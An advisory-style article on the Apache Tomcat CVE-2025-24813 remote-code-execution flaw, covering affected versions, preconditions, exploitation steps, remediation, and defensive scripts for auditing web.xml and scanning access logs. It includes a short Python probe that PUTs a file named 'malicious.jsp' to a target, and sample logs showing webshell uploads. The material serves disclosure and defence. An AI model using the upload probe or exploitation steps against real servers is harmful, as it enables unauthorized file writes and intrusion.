
Apache Tomcat, a widely used open-source Java servlet container, has addressed a critical vulnerability that can allow remote code execution. The flaw, tracked as CVE-2025-24813, affects Apache Tomcat 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98. It is a path-equivalence bug in the default servlet's handling of partial HTTP PUT requests, and it has been exploited in the wild, so affected organizations should move to the fixed releases promptly.
Key Takeaways
- Vulnerability: CVE-2025-24813, a path-equivalence flaw in Tomcat's default servlet reachable through partial HTTP PUT requests; on vulnerable configurations it leads to remote code execution (RCE).
- Affected Versions: Apache Tomcat 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98.
- Impact: Against a write-enabled default servlet an attacker can write arbitrary files; where the application uses file-based session persistence and ships a deserialization-prone library, this escalates to full control of the server.
- Status: Actively exploited in the wild.
- Remediation: Upgrade to Tomcat 11.0.3, 10.1.35 or 9.0.99 (or later), and keep the default servlet read-only.
Technical Details of the Vulnerability
The flaw is in how Tomcat's default servlet resolves file names while handling partial PUT requests (uploads carrying a Content-Range header): a name containing an internal dot is treated as path-equivalent to a different file. Per the Apache advisory, remote code execution requires all of the following: the default servlet is write-enabled (readonly=false, which is not the shipped default), partial PUT support is enabled (the default), the application uses Tomcat's file-based session persistence in its default storage location, and a library usable in a deserialization attack is on the classpath. With a different set of preconditions (public and security-sensitive uploads under related paths, both via partial PUT) the same bug lets an attacker read or inject content into sensitive uploaded files. When the RCE preconditions are met, a crafted partial PUT can place attacker-controlled serialized data in the session store; loading that session deserializes it, effectively granting the attacker full control over the affected system.
Exploitation Mechanism
- Malicious PUT Request: The attacker sends a partial HTTP PUT (with a Content-Range header) to a write-enabled default servlet, using a file name crafted to trigger the path-equivalence bug.
- File Upload: Tomcat writes the request body to disk; because of the path-equivalence flaw the content can land where the file-based session manager looks for persisted sessions.
- Code Execution: When Tomcat loads that session, the serialized data is deserialized and a gadget chain in an application library runs attacker-controlled code.
No authentication is required: the default servlet handles PUT before any application logic, so any client with network access to a vulnerable configuration can attempt it. The important caveat is that a stock Tomcat installation ships with the default servlet read-only, so exposure depends on deployment configuration, not on the version number alone.
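Because the RCE path depends on the default servlet being write-enabled with partial PUT support left on, the first thing to check on a deployment is conf/web.xml. The script below is an added example, not code from this page or from the Apache Tomcat project: it parses a web.xml, finds the servlet backed by DefaultServlet, and reports the weak settings. The two XML documents it contains are constructed; readonly is the documented DefaultServlet init-param, and allowPartialPut is assumed here to be the init-param that governs partial PUT support, as in the current DefaultServlet documentation.

```python
# Added example (not code from the page or from the Apache Tomcat project):
# audit a Tomcat conf/web.xml for the DefaultServlet settings that are
# preconditions for CVE-2025-24813. Both XML documents below are constructed.
import xml.etree.ElementTree as ET

# Constructed: a write-enabled default servlet (readonly=false) with partial PUT
# support left at its default (enabled).
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>"""

# Constructed: the hardened form. readonly=true is what Tomcat ships with.
HARDENED_WEB_XML = WEAK_WEB_XML.replace(
    "<param-name>readonly</param-name><param-value>false</param-value>",
    "<param-name>readonly</param-name><param-value>true</param-value>",
)


def _local(tag: str) -> str:
    """Strip the XML namespace so tag comparisons work with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def default_servlet_params(web_xml: str) -> dict:
    """Return the init-params of the servlet backed by DefaultServlet ({} if none)."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        classes = [c.text.strip() for c in servlet if _local(c.tag) == "servlet-class" and c.text]
        if not any(cls.endswith("DefaultServlet") for cls in classes):
            continue
        params = {}
        for ip in servlet:
            if _local(ip.tag) != "init-param":
                continue
            name = value = None
            for child in ip:
                if _local(child.tag) == "param-name":
                    name = (child.text or "").strip()
                elif _local(child.tag) == "param-value":
                    value = (child.text or "").strip()
            if name:
                params[name] = value
        return params
    return {}


def audit_default_servlet(web_xml: str) -> list:
    """Return findings describing write-enabled / partial-PUT exposure (empty = fine)."""
    params = default_servlet_params(web_xml)
    readonly = (params.get("readonly") or "true").lower()            # Tomcat default: true
    partial_put = (params.get("allowPartialPut") or "true").lower()  # assumed param; default: true
    findings = []
    if readonly == "false":
        findings.append("readonly=false: DefaultServlet accepts PUT/DELETE "
                        "(precondition for CVE-2025-24813)")
        if partial_put != "false":
            findings.append("allowPartialPut not set to false: partial PUT "
                            "(Content-Range) uploads are accepted")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(label, audit_default_servlet(doc) or ["no findings"])
```

Run it against a real file with `audit_default_servlet(open("conf/web.xml").read())`; an empty result means the default servlet is read-only and the RCE chain for this CVE cannot start, regardless of session-persistence settings.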
Affected Platforms and Products
The source lists the following affected products by vendor (distribution packages carry their own fixed versions):
Vendor | Affected products
---|---
Apache Software Foundation | Apache Tomcat
Debian | tomcat9, tomcat10
Red Hat | Red Hat Enterprise Linux 8, pki-servlet-engine, tomcat, tomcat6
SUSE | openSUSE
Relevance to Security Professionals
For Red Teamers
Red Teamers can leverage this vulnerability to demonstrate the risks associated with unpatched systems. Crafting a proof-of-concept (PoC) exploit for this vulnerability can be a valuable exercise in understanding how attackers might exploit such flaws.
For Blue Teamers and SOC Analysts
Blue Teamers and SOC Analysts should prioritize identifying and patching affected systems, and should confirm which deployments run a write-enabled default servlet, since only those are exposed. Monitoring access logs for HTTP PUT requests, particularly partial PUTs that the server answers with 201 or 204 followed by requests to the uploaded path, helps detect exploitation attempts.
For System Administrators
System Administrators must ensure that all affected versions of Apache Tomcat are updated to the latest patched versions. Regular vulnerability scans and patch management processes should be implemented to mitigate such risks in the future.
Proof of Concept (PoC) Script
Below is a Python script that shows the first stage of the attack: testing whether the server's default servlet accepts PUT uploads at all. It does not implement the path-equivalence or deserialization stages. Note: This script is for educational purposes only and should not be used maliciously.
import sys
import requests

# Target Tomcat base URL and the local file to upload; both can be overridden on the command line.
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://example.com/path/to/tomcat"
malicious_file = sys.argv[2] if len(sys.argv) > 2 else "malicious.jsp"

# Craft the PUT request. This only checks whether the DefaultServlet accepts writes
# (readonly=false), which is a precondition for CVE-2025-24813.
headers = {
"Content-Type": "text/plain"
}
with open(malicious_file, "rb") as file:
response = requests.put(f"{target_url.rstrip('/')}/{malicious_file}", data=file, headers=headers, timeout=10)

# Tomcat answers an accepted PUT with 201 Created (new file) or 204 No Content (overwrite);
# a 403 means the default servlet is read-only and the upload path is closed.
if response.status_code in (201, 204):
print(f"[+] File uploaded successfully: {target_url}/{malicious_file}")
else:
print(f"[-] Failed to upload file. Status code: {response.status_code}")
Remediation Steps
- Update Apache Tomcat: Upgrade to 11.0.3, 10.1.35 or 9.0.99 (or later), the releases that contain the fix.
- Remove the Preconditions: Where upgrading is delayed, keep the default servlet read-only (readonly=true in conf/web.xml, the shipped default), disable partial PUT support, and avoid file-based session persistence for applications that include deserialization-prone libraries.
- Monitor Logs: Regularly review access logs for HTTP PUT requests, especially partial PUTs answered with 201 or 204.
- Restrict Access: Limit access to the server to trusted IP addresses only, and never expose the default servlet's write methods to untrusted networks.
- Implement WAF: Use a Web Application Firewall (WAF) to block PUT requests to paths that should not accept uploads.
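The log review recommended here, and in the Blue Team section above, can be scripted. The following is an added example, not code from this page: it parses Tomcat access-log lines in the default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b), flags write methods, raises the severity when the server accepted the upload (201 or 204) or the target is an executable artefact, and reports the upload-then-fetch sequence that the Exploitation Mechanism section describes. Because the RCE variant of this CVE runs through Tomcat's file-based session store, paths naming .session files are treated as high severity too. The log lines are constructed.

```python
# Added example (not code from the page): flag PUT-based upload activity in
# Tomcat access logs. Assumes the default AccessLogValve pattern
# %h %l %u %t "%r" %s %b. All log lines below are constructed.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
WRITE_METHODS = {"PUT", "DELETE"}
EXEC_SUFFIXES = (".jsp", ".jspx", ".war")   # uploads Tomcat would execute or deploy

# Constructed sample: one rejected PUT, two accepted PUTs, then a fetch of the upload.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1532
198.51.100.5 - - [10/Mar/2025:14:02:12 +0000] "PUT /test.txt HTTP/1.1" 403 -
203.0.113.7 - - [10/Mar/2025:14:02:13 +0000] "PUT /uploads/shell.jsp HTTP/1.1" 201 -
203.0.113.7 - - [10/Mar/2025:14:02:14 +0000] "PUT /uploads/x.session HTTP/1.1" 204 -
198.51.100.5 - - [10/Mar/2025:14:03:02 +0000] "POST /api/items HTTP/1.1" 200 88
203.0.113.7 - - [10/Mar/2025:14:03:15 +0000] "GET /uploads/shell.jsp HTTP/1.1" 200 -
"""


def parse(line: str):
    """Parse one access-log line into a dict, or None if it does not match the pattern."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(lines):
    """Return (severity, host, detail) tuples for write requests and upload-then-fetch chains."""
    findings = []
    accepted = defaultdict(set)   # host -> paths the server accepted via PUT
    for raw in lines:
        rec = parse(raw)
        if rec is None:
            continue
        host, method, path = rec["host"], rec["method"], rec["path"]
        status = int(rec["status"])
        if method in WRITE_METHODS:
            # Any write method deserves a look; an accepted one (201 Created / 204 No Content
            # from the DefaultServlet) or an executable target raises the severity.
            severity = "medium"
            if status in (201, 204):
                severity = "high"
                accepted[host].add(path)
            if path.lower().endswith(EXEC_SUFFIXES) or ".session" in path:
                severity = "high"
            findings.append((severity, host, f"{method} {path} -> {status}"))
        elif method == "GET" and status == 200 and path in accepted.get(host, ()):
            # Upload followed by a fetch of the same path: the execute step of the chain.
            findings.append(("critical", host, f"GET of previously uploaded {path}"))
    return findings


if __name__ == "__main__":
    for severity, host, detail in analyze(SAMPLE_LOG.splitlines()):
        print(f"{severity:8} {host:15} {detail}")
```

Feed it a real file with `analyze(open("logs/localhost_access_log.txt"))`; lines in a custom pattern will simply not match and are skipped, so adjust LOG_RE if the AccessLogValve pattern has been changed.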
Conclusion
The discovery and patching of CVE-2025-24813 highlight the importance of maintaining up-to-date software and implementing robust security measures. Organizations using Apache Tomcat should act swiftly to apply the necessary updates and mitigate the risk of exploitation. This incident serves as a reminder of the constant vigilance required to protect systems from emerging threats.